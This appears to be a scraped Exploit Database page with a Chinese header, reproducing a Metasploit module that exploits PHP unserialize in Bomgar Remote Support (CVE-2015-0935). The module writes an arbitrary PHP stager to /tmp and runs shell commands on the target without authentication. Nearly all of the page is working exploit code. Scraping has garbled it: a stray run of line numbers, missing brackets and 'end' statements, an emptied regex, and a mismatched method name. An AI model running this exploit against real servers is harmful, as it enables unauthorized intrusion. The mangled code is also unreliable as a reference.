Bomgar Remote Support – Code Execution (Metasploit)

Exploit Database
112 阅读

作者： Markus Wulftange

日期： 2016-06-15
类别：
- remote
平台：
- linux
来源：https://www.exploit-db.com/exploits/39958/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::CmdStager

def initialize

super(

'Name' => 'Bomgar Remote Support Unauthenticated Code Execution',

'Description'=> %q{

This module exploits a vulnerability in the Bomgar Remote Support, which

deserializes user provided data using PHP's <code>unserialize</code> method.

By providing an specially crafted PHP serialized object, it is possible

to write arbitrary data to arbitrary files. This effectively allows the

execution of arbitrary PHP code in the context of the Bomgar Remote Support

system user.

To exploit the vulnerability, a valid Logging Session ID (LSID) is required.

It consists of four key-value pairs (i. e., 'h=[...];l=[...];m=[...];t=[...]')

and can be retrieved by an unauthenticated user at the end of the process

of submitting a new issue via the 'Issue Submission' form.

Versions before 15.1.1 are reported to be vulnerable.

'Author' =>

[

'Markus Wulftange',

'License'=> MSF_LICENSE,

'DisclosureDate' => 'May 5 2015',

'References' =>

[

['CWE', '94'],

['CWE', '502'],

['CVE', '2015-0935'],

['US-CERT-VU', '978652'],

['URL', 'http://codewhitesec.blogspot.com/2015/05/cve-2015-0935-bomgar-remote-support-portal.html'],

'Privileged' => false,

'Targets'=>

[

[ 'Linux x86',

{

'Platform'=> 'linux',

'Arch'=> ARCH_X86,

'CmdStagerFlavor' => [ :echo, :printf ]

}

[ 'Linux x86_64',

{

'Platform'=> 'linux',

'Arch'=> ARCH_X86_64,

'CmdStagerFlavor' => [ :echo, :printf ]

}

]

'DefaultTarget'=> 0,

'DefaultOptions' =>

{

'RPORT'=> 443,

'SSL'=> true,

'TARGETURI'=> '/session_complete',

)

register_options(

[

OptString.new('LSID', [true, 'Logging Session ID']),

], self.class

)

end

def check

version = detect_version

if version

print_status("Version #{version} detected")

if version < '15.1.1'

return Exploit::CheckCode::Appears

else

return Exploit::CheckCode::Safe

end

print_status("Version could not be detected")

return Exploit::CheckCode::Unknown

end

def exploit

execute_cmdstager

handler

end

def execute_command(cmd, opts)

tmpfile = "/tmp/#{rand_text_alphanumeric(10)}.php"

vprint_status("Uploading payload to #{tmpfile} ...")

upload_php_file(tmpfile, generate_stager_php(cmd))

vprint_status("Triggering payload in #{tmpfile} ...")

execute_php_file(tmpfile)

end

def detect_version

res = send_request_raw(

'uri' => '/'

)

if res and res.code == 200 and res.body.to_s =~ //

return $1

end

def upload_php_file(filepath, data)

send_pso(generate_upload_file_pso(filepath, data))

end

def execute_php_file(filepath)

send_pso(generate_autoload_pso(filepath))

end

def send_pso(pso)

res = send_request_cgi(

'method'=> 'POST',

'uri' => normalize_uri(target_uri.path),

'vars_post' => {

'lsid'=> datastore['LSID'],

'survey'=> pso,

}

)

if res

if res.code != 200

fail_with(Failure::UnexpectedReply, "Unexpected response from server: status code #{res.code}")

end

if res.body.to_s =~ />ERROR: ([^<>]+)</

fail_with(Failure::Unknown, "Error occured: #{$1}")

end

else

fail_with(Failure::Unreachable, "Error connecting to the remote server") unless successful

end

res

end

def generate_stager_php(cmd)

"<?php unlink(__FILE__); passthru('#{cmd.gsub(/[\\']/, '\\\\\&')}');"

end

def generate_upload_file_pso(filepath, data)

log_file = PHPObject.new(

"Log_file",

{

"_filename" => filepath,

"_lineFormat" => "",

"_eol"=> data,

"_append" => false,

}

)

logger = PHPObject.new(

"Logger",

{

"\0Logger\0_logs" => [ log_file ]

}

)

tracer = PHPObject.new(

"Tracer",

{

"\0Tracer\0_log" => logger

}

)

serialize(tracer)

end

def generate_autoload_pso(filepath)

object = PHPObject.new(

filepath.chomp('.php').gsub('/', '_'),

{}

)

serialize(object)

end

class PHPObject

attr_reader :name, :members

def initialize(name, members)

@name = name

@members = members

end

def serialize(value)

case value.class.name.split('::').last

when 'Array' then serialize_array_numeric(value)

when 'Fixnum' then serialize_integer(value)

when 'Float' then serialize_double(value)

when 'Hash' then serialize_array_assoc(value)

when 'Nil' then serialize_nil

when 'PHPObject' then serialize_object(value)

when 'String' then serialize_string(value)

when 'TrueClass', 'FalseClass' then serialize_boolean(value)

else raise "Value of #{value.class} cannot be serialized"

end

def serialize_array_numeric(a)

"a:#{a.size}:{" + a.each_with_index.map { |v, i|

serialize_integer(i) + serialize(v)

}.join + "}"

end

def serialize_array_assoc(h)

"a:#{h.size}:{" + h.each_pair.map { |k, v|

serialize_string(k) + serialize(v)

}.join + "}"

end

def serialize_boolean(b)

"b:#{b ? '1' : '0'};"

end

def serialize_double(f)

"d:#{f};"

end

def serialize_integer(i)

"i:#{i};"

end

def serialize_null

"N;"

end

def serialize_object(o)

"O:#{serialize_string(o.name)[2..-2]}:#{serialize_array_assoc(o.members)[2..-1]}"

end

def serialize_string(s)

"s:#{s.size}:\"#{s}\";"

end